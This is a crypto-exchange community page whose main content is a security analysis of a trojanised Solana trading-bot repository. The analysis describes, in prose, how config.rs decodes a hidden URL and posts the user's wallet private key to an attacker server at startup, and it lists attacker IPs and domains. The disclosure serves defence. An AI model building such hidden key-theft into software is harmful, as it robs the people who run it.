- Topic1/3
32k Popularity
10k Popularity
15k Popularity
7k Popularity
16k Popularity
- Pin
- 🎉 Gate Square Growth Points Summer Lucky Draw Round 1️⃣ 2️⃣ Is Live!
🎁 Prize pool over $10,000! Win Huawei Mate Tri-fold Phone, F1 Red Bull Racing Car Model, exclusive Gate merch, popular tokens & more!
Try your luck now 👉 https://www.gate.com/activities/pointprize?now_period=12
How to earn Growth Points fast?
1️⃣ Go to [Square], tap the icon next to your avatar to enter [Community Center]
2️⃣ Complete daily tasks like posting, commenting, liking, and chatting to earn points
100% chance to win — prizes guaranteed! Come and draw now!
Event ends: August 9, 16:00 UTC
More details: https://www
- #Gate 2025 Semi-Year Community Gala# voting is in progress! 🔥
Gate Square TOP 40 Creator Leaderboard is out
🙌 Vote to support your favorite creators: www.gate.com/activities/community-vote
Earn Votes by completing daily [Square] tasks. 30 delivered Votes = 1 lucky draw chance!
🎁 Win prizes like iPhone 16 Pro Max, Golden Bull Sculpture, Futures Voucher, and hot tokens.
The more you support, the higher your chances!
Vote to support creators now and win big!
https://www.gate.com/announcements/article/45974
Malicious Bots Reappear in the Solana Ecosystem, Open Source Project Hides Private Key Theft Trap
Malicious Bots Reappear in the Solana Ecosystem: Profile Hides Private Key Leak Trap
Recently, a user had their cryptocurrency assets stolen due to using an open-source project called pumpfun-pumpswap-sniper-copy-trading-bot. The security team conducted an in-depth analysis of this.
Static Analysis
Analysis found that suspicious code is located in the /src/common/config.rs configuration file, mainly concentrated in the create_coingecko_proxy() method. This method first calls import_wallet() to obtain the Private Key, and then decodes the malicious URL address.
The decoded real address is:
Malicious code then constructs a JSON request body, encapsulating the private key information within it, and sends it to the above URL via a POST request. Regardless of the server's response, the malicious code will continue to run to avoid raising user awareness.
The create_coingecko_proxy() method is called when the application starts, located in the main() method's configuration file initialization phase in main.rs.
The project was recently updated on GitHub on July 17, 202025, with major changes focused on the configuration file config.rs under the src directory. The original encoding of the HELIUS_PROXY( attacker server address) has been replaced with a new encoding.
Dynamic Analysis
To intuitively observe the theft process of malicious code, researchers wrote a Python script to generate test Solana public and private key pairs, and set up an HTTP server to receive POST requests.
Replace the encoded test server address with the malicious server address encoded set by the original attacker, and replace the PRIVATE_KEY(私钥) in the .env file with the test Private Key.
After launching the malicious code, the test server successfully received the JSON data sent by the malicious project, which contains PRIVATE_KEY( private key ) information.
Intrusion Indicators ( IoCs )
IP: 103.35.189.28 Domain: storebackend-qpq3.onrender.com
Malicious Repository:
Other repositories with similar implementation methods are also listed.
Summary
The attacker disguises as a legitimate open-source project to lure users into downloading and executing the malicious code. The project reads sensitive information from the local .env file and transmits the stolen Private Key to a server controlled by the attacker.
Developers are advised to remain highly vigilant towards unknown GitHub projects, especially when it involves wallet or Private Key operations. If it is necessary to run or debug, it is recommended to do so in a separate environment without sensitive data to avoid executing malicious programs and commands from unknown sources.